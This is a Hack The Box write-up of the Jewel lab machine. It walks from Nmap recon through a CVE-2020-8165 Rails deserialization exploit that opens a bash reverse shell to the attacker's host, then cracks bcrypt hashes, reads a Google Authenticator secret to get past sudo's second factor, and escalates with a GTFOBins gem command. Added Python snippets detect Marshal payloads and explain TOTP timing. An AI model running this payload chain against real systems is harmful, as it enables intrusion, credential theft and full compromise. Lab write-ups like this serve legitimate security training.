
Hack The Box Write-Up Jewel - 10.10.10.211

Experience is a jewel, and it need be so, for it is often purchased at an infinite rate.

William Shakespeare

About Jewel

In this post, I’m writing a write-up for the machine Jewel from Hack The Box. Hack The Box is an online platform to train your ethical hacking and penetration testing skills.

Jewel is a ‘Medium’ rated box. Grabbing and submitting the user.txt flag raises your points by 15, and submitting the root flag raises them by 30.

Foothold

The Nmap port scan discovered three open ports. The two interesting ones are 8000/tcp and 8080/tcp, both serving a web service. After checking the web services, I found in the Gitweb log that the backend is using Rails version 2.1.1. This version has a vulnerability, known as CVE-2020-8165.

User

After exploiting the vulnerability, I was able to establish a reverse shell as the user bill and could directly read the user flag.

Root

The root part was the most interesting part of this machine, IMO. After the enumeration, I had found four bcrypt hashes. John was able to crack the password of the user bill, but the sudo -l command then asks for a verification code: sudo is protected with second-factor authentication. In the home folder of the user bill, I found the Google Authenticator file with the secret. With this secret, I could configure Google Authenticator for the second-factor verification. The code depends on the system time; after syncing my system time with the time of the box, the second-factor authentication with the code from Google Authenticator works. The user account bill has permission to run gem as sudo. GTFOBins was the solution to gain root privileges and read the root flag.

Machine Info

Machine Name: Jewel
Difficulty: Medium
Points: 30
Release Date: 10 Oct 2020
IP: 10.10.10.211
Creator: polarbearer

Recon

Port scan with Nmap

As always, I start the box with a port scan with Nmap.

~$ nmap -sC -sV -oA ./nmap/10.10.10.211 10.10.10.211

The results.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-30 21:48 UTC
Nmap scan report for 10.10.10.211
Host is up (0.017s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA)
|   256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA)
|_  256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519)
8000/tcp open  http    Apache httpd 2.4.38
|_http-generator: gitweb/2.20.1 git/2.20.1
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
| http-title: 10.10.10.211 Git
|_Requested resource was http://10.10.10.211:8000/gitweb/
8080/tcp open  http    nginx 1.14.2 (Phusion Passenger 6.0.6)
|_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6
|_http-title: BL0G!
Service Info: Host: jewel.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.59 seconds

This machine acts as a webserver. The interesting part is the banner on the alternative HTTP port 8080/tcp: Phusion Passenger 6.0.6. On port 8000/tcp the directory /gitweb is visible.

Enumeration

Enumeration Webserver

I visited the URL http://10.10.10.211:8080 and landed on the website BL0G! There are Sign-Up and Login buttons visible in the top right corner. So, let’s register a user account.

(Screenshot: the BL0G! webserver on HTTP port 8080)

After creating the account and logging in, there is nothing interesting to find. I found some articles and two usernames, jennifer and bill. After clicking around a bit, I switched to the other HTTP port, 8000/tcp. I visited the URL http://10.10.10.211:8000 and the page gets redirected to http://10.10.10.211:8000/gitweb/.

I checked the Gitweb version in use, 2.20.1, which contains several vulnerabilities. I played around a bit with CVE-2019-19604, an OS command execution vulnerability, but I was not able to get this exploit working. I decided to look further for other attack vectors.

(Screenshot: the Gitweb web service)

After some searching and clicking around on this Gitweb page, I saw that Bill had placed a commit that changed 134 files on September 17th, 2020. This commit has the name ‘initial commit’. After checking the log of this commit, I found some software versions listed in the contents of the files, like ‘ruby 2.5.5’ and ‘rails .2.2.1’.

After a search on Google, I found that Rails 2.2.1 had a Remote Code Execution (RCE) vulnerability. The description of this vulnerability, according to Rapid7: ‘A deserialization of untrusted data vulnerability exists in rails < 5.2.4.3, rails < 6.0.3.1 that can allow an attacker to unmarshal user-provided objects in MemCacheStore and RedisCacheStore potentially resulting in an RCE.’

Intrusion

CVE-2020-8165

After searching Google again for a Proof-of-Concept (PoC), I found one on GitHub. After carefully reading the payload, I found that it has a typo: there is an ‘=’ missing to define the payload variable.

~$ git clone https://github.com/masahiro331/CVE-2020-8165.git
git clone https://github.com/masahiro331/CVE-2020-8165.git
Cloning into 'CVE-2020-8165'...
remote: Enumerating objects: 96, done.
remote: Counting objects: 100% (96/96), done.
remote: Compressing objects: 100% (74/74), done.
remote: Total 96 (delta 13), reused 88 (delta 9), pack-reused 0
Unpacking objects: 100% (96/96), 1.02 MiB | 1.33 MiB/s, done.
~$ bundle install --path vendor/bundle
~$ bundle exec rails db:migrate
~$ bundle exec rails s

Now access the rails console.

~$ sudo bundle exec rails console
Running via Spring preloader in process 17770
Loading development environment (Rails 5.2.3)

WARNING: This version of ruby is included in macOS for compatibility with legacy software. 
In future versions of macOS the ruby runtime will not be available by 
default, and may require you to install an additional package.

irb(main):001:0> code = '`/bin/bash -c "bash -i >& /dev/tcp/10.10.14.38/4444 0>&1"`'
irb(main):001:0> erb = ERB.allocate
irb(main):001:0> erb.instance_variable_set :@src, code
irb(main):001:0> erb.instance_variable_set :@filename, "1"
irb(main):001:0> erb.instance_variable_set :@lineno, 1
irb(main):001:0> payload = Marshal.dump(ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result)
irb(main):001:0> puts "Payload"
irb(main):001:0>
irb(main):001:0> require 'uri'
irb(main):001:0> puts URI.encode_www_form(payload: payload)

After the last command, I got the payload. This is my payload:

%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22%3F%60%2Fbin%2Fbash+-c+%22bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.10.14.38%2F4444+0%3E%261%22%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T

The second step is to put this payload in an HTTP request and send it to the webserver. I put the payload through Burp Suite on the profile update page. The username in the request needs to be replaced with the payload.

(Screenshot: the original HTTP request)

Now, I replace my username with the payload and send the request with the RCE payload to the webserver.

(Screenshot: sending the RCE payload)

The last step is going to the homepage: the server requests my updated username, which contains the reverse shell payload, and the payload gets executed.

Connection from 10.10.10.211:59414
bash: cannot set terminal process group (793): Inappropriate ioctl for device
bash: no job control in this shell
bill@jewel:~/blog$
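The username value carried by the profile-update request above is a URL-encoded Ruby Marshal stream. As an added example (not code from this post or from the PoC repository), here is how a request-log or WAF check can flag such values before they reach the cache: it decodes the form body byte-for-byte and looks for the Marshal header and the gadget class names. The `username` field name and both request bodies are constructed for illustration; the second body contains only the leading bytes of a Marshal object header, no command.

```python
from urllib.parse import unquote_to_bytes

# Ruby Marshal streams begin with the format version bytes 4.8 (0x04 0x08).
# The CVE-2020-8165 gadget chain serializes a DeprecatedInstanceVariableProxy
# wrapping an ERB object; "o:\x08ERB" is the Marshal object tag for ERB
# (':' symbol, length 3 encoded as 3+5), which avoids matching plain "ERB" text.
MARSHAL_MAGIC = b"\x04\x08"
GADGET_MARKERS = (b"ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy",
                  b"o:\x08ERB")

# Constructed request bodies; `username` is an assumed field name, not the
# blog's real form parameter.
BENIGN_BODY = b"utf8=%E2%9C%93&username=bill&email=bill%40jewel.htb"
MARSHAL_BODY = (b"utf8=%E2%9C%93&username=%04%08o%3A%40ActiveSupport%3A%3A"
                b"Deprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E"
                b"%40instanceo%3A%08ERB")

def decode_form(body: bytes) -> dict:
    """Decode application/x-www-form-urlencoded into {name: [raw value bytes]}.
    Stays in bytes throughout so non-UTF-8 Marshal content is not mangled."""
    fields = {}
    for pair in body.split(b"&"):
        if not pair:
            continue
        name, _, value = pair.partition(b"=")
        # '+' encodes a space in form bodies; %XX encodes one raw byte
        fields.setdefault(unquote_to_bytes(name).decode("latin-1"), []).append(
            unquote_to_bytes(value.replace(b"+", b" ")))
    return fields

def suspicious_fields(body: bytes) -> list:
    """Return (field, reason) for each value that looks like a serialized Ruby
    object: a Marshal header is decisive; a gadget marker elsewhere in the
    value is still worth an analyst's look."""
    hits = []
    for name, values in decode_form(body).items():
        for value in values:
            if value.startswith(MARSHAL_MAGIC):
                hits.append((name, "ruby-marshal-header"))
            elif any(marker in value for marker in GADGET_MARKERS):
                hits.append((name, "gadget-marker"))
    return hits
```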

The next step is to grab the user flag.

bill@jewel:~/blog$ ls
ls
app
bd.sql
bin
config
config.ru
db
Gemfile
Gemfile.lock
lib
log
node_modules
package.json
public
Rakefile
README.md
storage
test
tmp
vendor
yarn.lock
bill@jewel:~/blog$ cd /home     
cd /home
bill@jewel:/home$ ls
ls
bill
bill@jewel:/home$ cd bill
cd bill
bill@jewel:~$ cat user.txt
cat user.txt
b3c76eb0ffdac2b874ffe75d4d6f0191
bill@jewel:~$ 

Privilege Escalation

Enumeration

First, I upgrade the shell, and then I can start the enumeration for root. Let’s start the enumeration from the home folder of the user account bill.

bill@jewel:~/blog$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'

When I run the command sudo -l, I need to fill in a password. I do not have the password, so I left it empty. The response from this box is quite fun: after filling in no password or the wrong password, the box generates random messages. This is what I need to keep in mind. When I have the password of bill, this command can be the next step.

I downloaded linpeas.sh to the machine and after running the script, it has found two password hashes. Let’s try to crack both of them with my little buddy John the Ripper.

[+] Searching specific hashes inside files - less false positives (limit 70)
/var/backups/dump_2020-08-27.sql:$2a$12$sZac9R2VSQYjOcBTTUYy6.Zd.5I02OnmkKnD3zA6MqMrzLKz0jeDO
/home/bill/blog/bd.sql:$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW

The hashes are bcrypt (Blowfish 32/64 X3) hashes; I have pasted them in a file called hashes.txt. After more searching, I found another hash in the file /home/bill/blog/bd.sql and one in the http://10.10.10.211:8000/gitweb/?p=.git;a=patches file. I gave these hashes to john and ran them against the rockyou.txt wordlist.

$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW
$2a$12$ik.0o.TGRwMgUmyOR.Djzuyb/hjisgk2vws1xYC/hxw8M1nFk0MQy
$2a$12$sZac9R2VSQYjOcBTTUYy6.Zd.5I02OnmkKnD3zA6MqMrzLKz0jeDO
$2a$12$QqfetsTSBVxMXpnTR.JfUeJXcJRHv5D5HImL0EHI7OzVomCrqlRxW

After a couple of seconds, I got the password spongebob. After some testing, I found that this is the password for the user account bill.

~$ john hashes.txt -wordlist=../../wordlists/rockyou.txt
Loaded 4 password hashes with 4 different salts (bcrypt [Blowfish 32/64 X3])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:35 0% 0g/s 2.425p/s 9.868c/s 9.868C/s naruto..sweety
spongebob        (?)

Now, I can run the sudo -l command, because I have the password.

bill@jewel:~/blog$ sudo -l
sudo -l
[sudo] password for bill: spongebob

Verification code:

Well, that’s interesting. It seems I need another step of verification.

Enumeration two-step verification

I need to find a way past the two-step verification. Most people use Google Authenticator as the second factor, so let’s check if I can find something about Google. I checked the home folder of the user account bill, and there is a Google Authenticator file.

bill@jewel:~$ ls -la
ls -la
total 52
drwxr-xr-x  6 bill bill 4096 Sep 17 14:10 .
drwxr-xr-x  3 root root 4096 Aug 26 09:32 ..
lrwxrwxrwx  1 bill bill    9 Aug 27 11:26 .bash_history -> /dev/null
-rw-r--r--  1 bill bill  220 Aug 26 09:32 .bash_logout
-rw-r--r--  1 bill bill 3526 Aug 26 09:32 .bashrc
drwxr-xr-x 15 bill bill 4096 Nov  5 21:41 blog
drwxr-xr-x  3 bill bill 4096 Aug 26 10:33 .gem
-rw-r--r--  1 bill bill   43 Aug 27 10:53 .gitconfig
drwx------  3 bill bill 4096 Nov  5 19:40 .gnupg
-r--------  1 bill bill   56 Aug 28 07:00 .google_authenticator
drwxr-xr-x  3 bill bill 4096 Aug 27 10:54 .local
-rw-r--r--  1 bill bill  807 Aug 26 09:32 .profile
lrwxrwxrwx  1 bill bill    9 Aug 27 11:26 .rediscli_history -> /dev/null
-r--------  1 bill bill   33 Nov  4 19:54 user.txt
-rw-r--r--  1 bill bill  116 Aug 26 10:43 .yarnrc

I opened the file .google_authenticator and the secret is visible! With this secret, I’m able to configure the second-factor authentication.

bill@jewel:~$ cat .google_authenticator
cat .google_authenticator
2UQI3R52WFCLE6JTLDCSJYMJH4
" WINDOW_SIZE 17
" TOTP_AUTH

I added the Authenticator extension by mymindstorm to my Firefox.

(Screenshot: adding the two-factor secret to the Authenticator extension)

After configuring the extension with the secret, I’m able to get the OTP from the authenticator. I tried the code with the sudo -l command as the user bill, but I received an error. Again, with a custom message.

bill@jewel:~$ sudo -l
sudo -l
[sudo] password for bill: spongebob

Verification code: 699658

Error "Operation not permitted" while writing config
I don't wish to know that.

Own the machine

After doing some research, I found that the verification code is calculated from the time of the machine. So, the time of my machine needs to be in sync with the box. The box is using the Europe/London timezone. After setting my machine to that timezone, I was able to enter the verification code correctly.

Matching Defaults entries for bill on jewel:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    insults

User bill may run the following commands on jewel:
    (ALL : ALL) /usr/bin/gem
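The earlier "Operation not permitted" attempt and the fix above come down to clock skew. As an added example (not code from this post), here is the TOTP arithmetic the authenticator extension performs, a parser for the .google_authenticator layout shown earlier, and a check that applies WINDOW_SIZE the way pam_google_authenticator does (my reading of that module, not quoted from it). The sample file uses the RFC 6238 test secret instead of the box's secret so the outputs can be checked against the RFC vectors; the counter is derived from Unix epoch time, so it is the clock offset between client and server that has to stay within the window.

```python
import base64
import hashlib
import hmac
import struct

STEP = 30      # seconds per code: RFC 6238 default, used by Google Authenticator
DIGITS = 6

# Constructed file in the layout of ~/.google_authenticator shown in the post.
# The secret is the RFC 4226/6238 test key ("12345678901234567890" in base32),
# not the box's secret, so results can be checked against the RFC vectors.
SAMPLE_FILE = 'GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ\n" WINDOW_SIZE 17\n" TOTP_AUTH\n'

def parse_google_authenticator(text: str) -> tuple:
    """First non-empty line is the base32 secret; lines starting with '" ' are
    pam_google_authenticator options such as WINDOW_SIZE (value may be empty)."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    options = {}
    for ln in lines[1:]:
        if ln.startswith('" '):
            name, _, value = ln[2:].partition(" ")
            options[name] = value
    return lines[0], options

def hotp(secret_b32: str, counter: int, digits: int = DIGITS) -> str:
    """RFC 4226: HMAC-SHA1 over the 8-byte big-endian counter, then dynamic truncation."""
    key = base64.b32decode(secret_b32.upper() + "=" * (-len(secret_b32) % 8))
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(secret_b32: str, unix_time: int) -> str:
    """RFC 6238: HOTP with counter = unix_time // STEP. Input is Unix epoch time,
    so only the clock offset between client and server matters, not the timezone."""
    return hotp(secret_b32, unix_time // STEP)

def verify(secret_b32: str, code: str, server_time: int, window_size: int = 3) -> bool:
    """Accept `code` if it matches any of `window_size` consecutive steps centred on
    the server's current step (my reading of WINDOW_SIZE: 17 allows about +/- 4 min)."""
    centre, half = server_time // STEP, window_size // 2
    return any(hmac.compare_digest(hotp(secret_b32, c), code)
               for c in range(centre - half, centre + half + 1))

def skew_tolerated(text: str, skew_seconds: int, server_time: int = 1234567890) -> bool:
    """Would a client whose clock is `skew_seconds` off the server still be accepted?"""
    secret, opts = parse_google_authenticator(text)
    client_code = totp(secret, server_time + skew_seconds)
    return verify(secret, client_code, server_time, int(opts.get("WINDOW_SIZE", 3)))
```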

Bill has permission to run gem as sudo. I know that GTFOBins has some nice commands to break out of restricted environments: gem on GTFOBins, https://gtfobins.github.io/gtfobins/gem/.

I ran this command and was able to read the root flag.

bill@jewel:~$ sudo gem open -e "/bin/sh -c /bin/sh" rdoc
sudo gem open -e "/bin/sh -c /bin/sh" rdoc
# cat /root/root.txt
cat /root/root.txt
20e32770bb20e703e4149c4690431076

Thanks for reading this write-up! Did you enjoy reading it, or learn something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856. Thanks!

Happy Hacking :-)

This post is licensed under CC BY 4.0 by the author.